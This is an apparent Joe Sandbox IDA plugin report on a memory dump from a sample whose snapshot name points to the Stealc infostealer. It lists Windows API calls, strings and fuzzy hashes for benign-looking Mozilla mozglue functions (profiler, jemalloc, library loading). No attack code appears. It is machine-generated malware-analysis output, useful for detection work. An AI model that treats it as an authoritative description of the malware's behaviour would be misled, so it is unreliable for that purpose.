Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C10EBAC

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

GetCurrentThreadId.KERNEL32 ref: 6C10EBC1
AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000), ref: 6C10EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C10EBE5
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,00000000), ref: 6C10EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10EC46
CloseHandle.KERNEL32(?), ref: 6C10EC55
free.MOZGLUE(00000000), ref: 6C10EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C10EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C10EA9B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: bb4c5ded92bf95be75c132c7e62208ddc4c383101cbe8b8eea77551e144656a5
Instruction ID: 14baa09e891a8bdf693262f5927ec69ee4e036c1b9b6fb3a33368d350f849af3
Opcode Fuzzy Hash: bb4c5ded92bf95be75c132c7e62208ddc4c383101cbe8b8eea77551e144656a5
Instruction Fuzzy Hash: BEA14771700604CFCB10AF29C854BAA77B5FF8A31CF18C129E96997B81DF709906CBA1

Function 6C10F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C10F8F9

Part of subcall function 6C0D6390: GetCurrentThreadId.KERNEL32 ref: 6C0D63D0
Part of subcall function 6C0D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0D63DF
Part of subcall function 6C0D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0D640E

ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F93A
GetCurrentThreadId.KERNEL32 ref: 6C10F98A
GetCurrentThreadId.KERNEL32 ref: 6C10F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F716

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

Part of subcall function 6C0CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C0CB5E0

GetCurrentThreadId.KERNEL32 ref: 6C10F739
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F746
GetCurrentThreadId.KERNEL32 ref: 6C10F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C14385B,00000002,?,?,?,?,?), ref: 6C10F829
free.MOZGLUE(?,?,00000000,?), ref: 6C10F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C10F866
free.MOZGLUE(?), ref: 6C10FA0C

Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D5E8C
Part of subcall function 6C0D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5E9D
Part of subcall function 6C0D5E60: GetCurrentThreadId.KERNEL32 ref: 6C0D5EAB
Part of subcall function 6C0D5E60: GetCurrentThreadId.KERNEL32 ref: 6C0D5EB8
Part of subcall function 6C0D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5ECF
Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C0D5F27
Part of subcall function 6C0D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C0D5F47
Part of subcall function 6C0D5E60: GetCurrentProcess.KERNEL32 ref: 6C0D5F53
Part of subcall function 6C0D5E60: GetCurrentThread.KERNEL32 ref: 6C0D5F5C
Part of subcall function 6C0D5E60: GetCurrentProcess.KERNEL32 ref: 6C0D5F66
Part of subcall function 6C0D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0D5F7E

free.MOZGLUE(?), ref: 6C10F9C5
free.MOZGLUE(?), ref: 6C10F9DA

Strings

[D %d/%d] profiler_register_thread(%s), xrefs: 6C10F71F
Thread , xrefs: 6C10F789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C10F9A6
" attempted to re-register as ", xrefs: 6C10F858

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 78b1b2f549570d5c90c2860dd53f26986862969f079389ac8568b2d05053b7ae
Instruction ID: 02eca14296dbbf22d11f62c1d3f736ebafb2c540fca73e5f7e8c59c79396ef92
Opcode Fuzzy Hash: 78b1b2f549570d5c90c2860dd53f26986862969f079389ac8568b2d05053b7ae
Instruction Fuzzy Hash: 1781F075A047049FDB10EF24C840BAEB7E5FFC5308F45896DE8599BB51EB30A849CB92

Function 6C0D4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0D4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0D41F1
VerSetConditionMask.NTDLL ref: 6C0D4223
VerSetConditionMask.NTDLL ref: 6C0D422A
VerSetConditionMask.NTDLL ref: 6C0D4231
VerSetConditionMask.NTDLL ref: 6C0D4238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0D4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C0D427A
FreeLibrary.KERNEL32(?), ref: 6C0D4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D42C4
VerSetConditionMask.NTDLL ref: 6C0D42F6
VerSetConditionMask.NTDLL ref: 6C0D4302
VerSetConditionMask.NTDLL ref: 6C0D4309
VerSetConditionMask.NTDLL ref: 6C0D4310
VerSetConditionMask.NTDLL ref: 6C0D4317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D4324

Strings

Shcore.dll, xrefs: 6C0D425E
SetProcessDpiAwareness, xrefs: 6C0D4274

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 2357632dd1141bfeefa30106c64a605f36b7e87d04df8a5e4fed3fab62c4d2e5
Instruction ID: 16650ffba1fb15a5198d238a7ea4a45f58779629127a94e6194960c77667e622
Opcode Fuzzy Hash: 2357632dd1141bfeefa30106c64a605f36b7e87d04df8a5e4fed3fab62c4d2e5
Instruction Fuzzy Hash: 5251D571A443146BEB10ABA48C48FBFB7B8DF85758F428518F905A76C0DB74ED508B90

Function 6C10EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10EE60
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EE6D
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10EEA5
CloseHandle.KERNEL32(?), ref: 6C10EEB4
free.MOZGLUE(00000000), ref: 6C10EEBB
GetCurrentThreadId.KERNEL32 ref: 6C10EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10EECF

Part of subcall function 6C10DE60: GetCurrentThreadId.KERNEL32 ref: 6C10DE73
Part of subcall function 6C10DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0D4A68), ref: 6C10DE7B
Part of subcall function 6C10DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0D4A68), ref: 6C10DEB8
Part of subcall function 6C10DE60: free.MOZGLUE(00000000,?,6C0D4A68), ref: 6C10DEFE
Part of subcall function 6C10DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C10DF38

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

GetCurrentThreadId.KERNEL32 ref: 6C10EF1E
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EF2B
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EF59
GetCurrentThreadId.KERNEL32 ref: 6C10EFB0
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EFBD
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EFE1
GetCurrentThreadId.KERNEL32 ref: 6C10EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F000

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F02F

Part of subcall function 6C10F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10F09B
Part of subcall function 6C10F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C10F0AC
Part of subcall function 6C10F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C10F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C10EED7
[I %d/%d] profiler_pause, xrefs: 6C10F008

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: fbdcf23ffafb974f5053e95694deabdb89ecf1d7e75746c22cc3cfe6112e705a
Instruction ID: f413f991ee5cb0b98af912ead777e678ef87729e68da7519e93baeee340601ff
Opcode Fuzzy Hash: fbdcf23ffafb974f5053e95694deabdb89ecf1d7e75746c22cc3cfe6112e705a
Instruction Fuzzy Hash: C4513635704614DFDB00BB65D408BAA37B4EF4632CF18C669E93583B80DF745906DBA2

Function 6C0FD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C14E804), ref: 6C0FD047
GetSystemInfo.KERNEL32(?), ref: 6C0FD093
__Init_thread_footer.LIBCMT ref: 6C0FD0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C14E810,00000040), ref: 6C0FD0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E7B8,00001388), ref: 6C0FD147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E744,00001388), ref: 6C0FD162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E784,00001388), ref: 6C0FD18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C14E7DC,00001388), ref: 6C0FD1B1

Strings

MOZ_CRASH(), xrefs: 6C0FD277
<jemalloc>, xrefs: 6C0FD268, 6C0FD311
: (malloc) Unsupported character in malloc options: ', xrefs: 6C0FD322
Compile-time page size does not divide the runtime one., xrefs: 6C0FD26D
MALLOC_OPTIONS, xrefs: 6C0FD0CB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: ffa778f2f05664d0f6db56388536fce7b5acefbaa952b7da36c4b3a25518420d
Instruction ID: 22590d175af55ae49e969902f8e31647f3a514998701ea4a588356263d6e1785
Opcode Fuzzy Hash: ffa778f2f05664d0f6db56388536fce7b5acefbaa952b7da36c4b3a25518420d
Instruction Fuzzy Hash: F281EE70B003019BEB00EF68C854B69BBF5FF5672DF108129EA2197B80D7759A82DBD1

Function 6C10FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C10FADC
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10FAE9
GetCurrentThreadId.KERNEL32 ref: 6C10FB31
GetCurrentThreadId.KERNEL32 ref: 6C10FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C10FBF6
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10FC50

Strings

[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C10FD15
[D %d/%d] profiler_unregister_thread: %s, xrefs: 6C10FC94

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 51c6b18aa5c22fae5b653421bd5e6b2ea4c69e60d215b32c9cd82f75c022eee1
Instruction ID: 2e41f7ed113782935be2d51f9f3650370c45fbf9f5b8ddfdcc1c60402215da28
Opcode Fuzzy Hash: 51c6b18aa5c22fae5b653421bd5e6b2ea4c69e60d215b32c9cd82f75c022eee1
Instruction Fuzzy Hash: C271F175B047008FD710EF29C546B6AB7F0FF89308F058569E86587B51EF30A845CB95

Function 6C0D5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5E9D

Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4

GetCurrentThreadId.KERNEL32 ref: 6C0D5EAB
GetCurrentThreadId.KERNEL32 ref: 6C0D5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C0D6017

Part of subcall function 6C0C4310: moz_xmalloc.MOZGLUE(00000010,?,6C0C42D2), ref: 6C0C436A
Part of subcall function 6C0C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0C42D2), ref: 6C0C4387

moz_xmalloc.MOZGLUE(00000004), ref: 6C0D5F47
GetCurrentProcess.KERNEL32 ref: 6C0D5F53
GetCurrentThread.KERNEL32 ref: 6C0D5F5C
GetCurrentProcess.KERNEL32 ref: 6C0D5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C0D5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C0D5F27

Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D5E8C

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0D55E1), ref: 6C0D60CC

Strings

GeckoMain, xrefs: 6C0D5ECE, 6C0D6015

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: a1b6f6131ca0dc471c7abbfad2c165f7634197086cae399e4c5c8a2519e32962
Instruction ID: ba026a842505e5aa89f802f8d95719b1f2f77636623f89400be51906b5e0e070
Opcode Fuzzy Hash: a1b6f6131ca0dc471c7abbfad2c165f7634197086cae399e4c5c8a2519e32962
Instruction Fuzzy Hash: 8B718CB46047409FD710DF28C480B6ABBF0BF99308F55896DE9968BB52D731B948CB92

Function 6C0D9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0C3217
Part of subcall function 6C0C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0C3236
Part of subcall function 6C0C31C0: FreeLibrary.KERNEL32 ref: 6C0C324B
Part of subcall function 6C0C31C0: __Init_thread_footer.LIBCMT ref: 6C0C3260
Part of subcall function 6C0C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0C327F
Part of subcall function 6C0C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C328E
Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32AB
Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32D1
Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0C32E5
Part of subcall function 6C0C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0C32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0D9675
__Init_thread_footer.LIBCMT ref: 6C0D9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0D96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0D9707
__Init_thread_footer.LIBCMT ref: 6C0D971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0D97B7
FreeLibrary.KERNEL32 ref: 6C0D97D0
FreeLibrary.KERNEL32 ref: 6C0D97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9824

Strings

ntdll.dll, xrefs: 6C0D96E3
MapViewOfFileNuma2, xrefs: 6C0D97B1
NtMapViewOfSection, xrefs: 6C0D9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C0D9670

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

